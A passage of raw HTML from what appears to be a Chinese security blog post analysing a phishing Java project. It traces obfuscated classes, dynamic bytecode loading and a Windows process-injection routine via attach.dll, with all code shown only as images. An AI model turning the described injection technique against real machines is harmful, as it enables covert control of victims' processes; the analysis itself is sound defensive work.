style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">紧跟</span><span style="font-family:Calibri;">sockPwn.pwn</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6518518518518519" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=d8f2bf78&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJ7f8DT7DNngYf48R53vW7ibCP9St3whiby2QXEbIg9x7e1z1DPObvDhzA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">新的解密，一堆赋值，看一眼</span><span style="font-family:Calibri;">rand_p</span><span style="font-family:宋体;">是干啥。</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3516597510373444" data-s="300,640" style="" data-type="png" data-w="964" src="https://wechat2rss.xlab.app/img-proxy/?k=42ad176b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJZU71yTVUuaCx0zkCXTaN2sCJtcbJnUb1g9JK2WEicMdeEf2PH2yQc4A%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">这段代码生成了一个最大到</span><span style="font-family:Calibri;">11904</span><span style="font-family:宋体;">的随机数。虽然不知道确切是做什么的但是结合上文</span><span style="font-family:Calibri;">pwn</span><span style="font-family:宋体;">功能来看是大概率是为</span><span style="font-family:Calibri;">Socket</span><span style="font-family:宋体;">开启了一个随机端口。</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">看回</span><span style="font-family:Calibri;">pwn</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.12460567823343849" data-s="300,640" style="" data-type="png" data-w="634" src="https://wechat2rss.xlab.app/img-proxy/?k=2be229de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJGNDeFoZ8oqFgpXo1731KrU97libLGRaibgiabn2jA4tshlABpdMicpux0g%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">上述各种赋值包括目前还是密的混淆代码，和疑似开启的随机端口都被赋值给了</span><span style="font-family:Calibri;">var5</span><span style="font-family:宋体;">。</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">先记下来后面慢慢盘。</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.0813464235624124" data-s="300,640" style="" data-type="png" data-w="713" src="https://wechat2rss.xlab.app/img-proxy/?k=4710c978&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJhW1UEIawH3EMrh6FrQ6LT93lLU3d1AtxQ0qs77icMefJsLmEHGxYaPg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">这段</span><span style="font-family:Calibri;">try-catch</span><span style="font-family:宋体;">用于执行一系列网络操作。它通过</span><span style="font-family:Calibri;">Socket</span><span style="font-family:宋体;">对象与特定主机和端口建立连接，并发送特定的字符串数据。然后使用线程池执行任务，并最后关闭线程池。</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">解密混淆后的字符串查看</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.15703125" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=ef894513&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJrouHPkHCetI9TgvBjwOaCgPhduQTUPw6zQibvkCzTmaNxTRuPFlQZPA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.19051446945337622" data-s="300,640" style="" data-type="png" data-w="1244" src="https://wechat2rss.xlab.app/img-proxy/?k=3f883a29&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJvvxRe4aFxKj34fVDDoKA95om42YicQQYKFsHCnLXFH82Hn3fciccVqNA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.16963350785340314" data-s="300,640" style="" data-type="png" data-w="955" src="https://wechat2rss.xlab.app/img-proxy/?k=b28504da&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJzwo239ibibwGVahlp8xHm8AGzgG5YOiaibWia9XtTaCBlbYbGx91cKfmgZQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">这段核心实现在</span><span style="font-family:Calibri;">253</span><span style="font-family:宋体;">行附近</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.31484375" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=3eda04a3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJ9pKricKfIpSiaEh5LsQWSqjOKMtFQGibZJQrUXeOwezU9k06d5RYpNOnA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">使用</span>ExecutorService</span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">的</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">submit<span style="font-family:宋体;">方法，将一</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">个</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">任务提交到线程池</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">。</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">以当前对象为目标，调用方法</span>pwn_type()<span style="font-family:宋体;">。</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3671875" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=1d291ba7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJNbgqfWJQuayWTRM46wxaicxgrHFK2EbUVD917C0Lsbc0JbScwXgMwCA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">这段代码根据系统属性</span>&#34;e&lt;$!k\&#34;o&#34;<span style="font-family:宋体;">的值，判断其是否包含特定的字符串，然后执行相应的操作。如果包含字符串</span><span style="font-family:Calibri;">&#34;}&amp;d&#34;</span><span style="font-family:宋体;">，则创建一个</span><span style="font-family:Calibri;">pwnAction</span><span style="font-family:宋体;">对象并调用其</span><span style="font-family:Calibri;">action()</span><span style="font-family:宋体;">方法。如果包含字符串</span><span style="font-family:Calibri;">&#34;g.i&#34;</span><span style="font-family:宋体;">，则创建一个</span><span style="font-family:Calibri;">sockPwn</span><span style="font-family:宋体;">对象</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">。</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">解密看看都代表了什么</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.29079159935379645" data-s="300,640" style="" data-type="png" data-w="619" src="https://wechat2rss.xlab.app/img-proxy/?k=3e978f89&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJgw0dGFyHcfOxGG1OJp9FW0A2LXKtf7IbImCjkNrib0ibT0hZRbJvRC0w%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.22009569377990432" data-s="300,640" style="" data-type="png" data-w="627" src="https://wechat2rss.xlab.app/img-proxy/?k=77a2f0bd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJPSBicX1HMBBnE1KIHFgEoNt63JBPF54szXr2EFvmkQ3AGlZzoZqic8wg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.21585160202360876" data-s="300,640" style="" data-type="png" data-w="593" src="https://wechat2rss.xlab.app/img-proxy/?k=0bc8c27c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJJlqPC57qACN7kqvtIEm9QNmEhTdZ2x95d9QvDm722qWUUhoqCM9IgA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.18097643097643099" data-s="300,640" style="" data-type="png" data-w="1188" src="https://wechat2rss.xlab.app/img-proxy/?k=6842302f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJOuHBlHQnJqXQ9zVBG9tYHgiakOjPBJL85MHcaSe6aaMUic588YV77vVg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">钓鱼佬的嘲讽。</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">跟进</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">pwnAction</span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">马上就能看到他最后做了什么</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5140625" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=5893d6d0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJAbWFYv8lQOxiaPVE5Rq58KqepNiauiacic0bkuulUkib7oYEPqVicsbnAL0g%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">解密后结果</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.175" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=d663972b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJ8MGbKnXsxKnsJETP4eIrBMlTh0hiak5x7lSBibqnEE6dh8TPrmLAB5Sw%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.2318548387096774" data-s="300,640" style="" data-type="png" data-w="992" src="https://wechat2rss.xlab.app/img-proxy/?k=e66486c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJLPOtlhxtHEJCKDBn1iaryZaUujiaSHSyMbN5cHRt04ToCgIpo0AeDULQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.1395985401459854" data-s="300,640" style="" data-type="png" data-w="1096" src="https://wechat2rss.xlab.app/img-proxy/?k=268da68f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJVSemea6gGMy3GTzbBAO2RLnicCTPILCwicibZxRaSiabU2lSicVJISusObA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.17272727272727273" data-s="300,640" style="" data-type="png" data-w="990" src="https://wechat2rss.xlab.app/img-proxy/?k=6f34a555&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJmH5KWu1I7rGhrVbtViciaxGjfia18kbd7ib0FM5PNLbcnVq7H1NhmmVOHA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">核心看下面这两行</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.30205540661304736" data-s="300,640" style="" data-type="png" data-w="1119" src="https://wechat2rss.xlab.app/img-proxy/?k=b8f09cf6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJyFbF8W6ia6cNnKPXDz5BHCxiciaic2qqTYPMiamfVxicaaO6YC25ODcnGzHw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">熟悉的</span><span style="font-family:Calibri;">defineClass()</span><span style="font-family:宋体;">，这几行实现了反射获取指定类的</span><span style="font-family:Calibri;">Class</span><span style="font-family:宋体;">对象，如果类不存在则通过</span><span style="font-family:Calibri;">dump()</span><span style="font-family:宋体;">方法获取类的字节码，然后使用</span><span style="font-family:Calibri;">defineClass()</span><span style="font-family:宋体;">方法创建一个新的类对象。熟悉的配方，熟悉的味道啊。看一眼</span><span style="font-family:Calibri;">dump</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.53125" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=a62606a6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJ9w39vL9D31983McrhuKCVrFhPS3rMWPQNib1W4LeHCib6MzjWLuuHKIg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.4125" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=473a4708&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJY7fVicuwdrTqyQicauU430c9RR1tFtOK7Sd9k3HaTBX0p69EWpJfnic3g%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">解密后对照表</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8526405451448041" data-s="300,640" style="" data-type="png" data-w="1174" src="https://wechat2rss.xlab.app/img-proxy/?k=15e79bcf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJibLnuHAxh6EPwlf21pmaibEfomtgxxJIZib8iaaqdrKn1VOT8IpLS0Pic2A%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">修改后代码成这样，使用字节码生成了一个类。具体太乱了回到上面看到了</span><span style="font-family:Calibri;">findAttachDllPath</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.2750373692077728" data-s="300,640" style="" data-type="png" data-w="669" src="https://wechat2rss.xlab.app/img-proxy/?k=99d579a9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJEgLawibFOzL3ZzqCWwW7eWCudGCKSFF0xTkVibOZZXspGMFiblJJRQIqg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.4609375" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=83963786&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJk1Lmbxp1zuMzGBZralhLUFHNtgwC2bKLb0MSCMyiboAINc9lHgjOLlQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">解密后</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.70703125" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=f6f89b0c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJrVujhZ7DueTLibPrldCNUSQIUliaJblkGFMEgOQX7nNAqJ58qVhQP3PA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">这段代码的目的是搜索系统中的</span><span style="font-family:Calibri;">attach.dll</span><span style="font-family:宋体;">文件。</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">结合所有已知信息分析。这段代码是一个用于攻击的</span> <span style="font-family:Calibri;">Java </span><span style="font-family:宋体;">类，在运行时加载自身，如目标是win就</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;color:rgb(255,0,0);font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">执行其中的</span><span style="font-family:Calibri;">action()</span><span style="font-family:宋体;">方法</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">。</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;color:rgb(255,0,0);font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">该方法会从系统中查找</span><span style="font-family:Calibri;">attach.dll</span><span style="font-family:宋体;">并设置其为</span><span style="font-family:Calibri;">java.library.path</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">，</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;color:rgb(255,0,0);font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">然后使用</span> <span style="font-family:Calibri;">ClassLoader </span><span style="font-family:宋体;">动态加载 </span><span style="font-family:Calibri;">sun.tools.attach.WindowsVirtualMachine </span><span style="font-family:宋体;">类</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">，</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;color:rgb(255,0,0);font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">并通过调用</span> <span style="font-family:Calibri;">openProcess </span><span style="font-family:宋体;">方法打开一个进程，然后调用 </span><span style="font-family:Calibri;">enqueue </span><span style="font-family:宋体;">方法往该进程中注入一个模块</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">，</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;color:rgb(255,0,0);font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">最终达到控制目标进程的结果</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">。</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">具体攻击详情存在于</span><span style="font-family:Calibri;">dll</span><span style="font-family:宋体;">中，由于本人并不会</span><span style="font-family:Calibri;">dll</span><span style="font-family:宋体;">的分析所以只能明早交给兄弟来。大概分析至此可以实锤，本项目为钓鱼项目无疑。</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.38203125" data-s="300,640" style="" 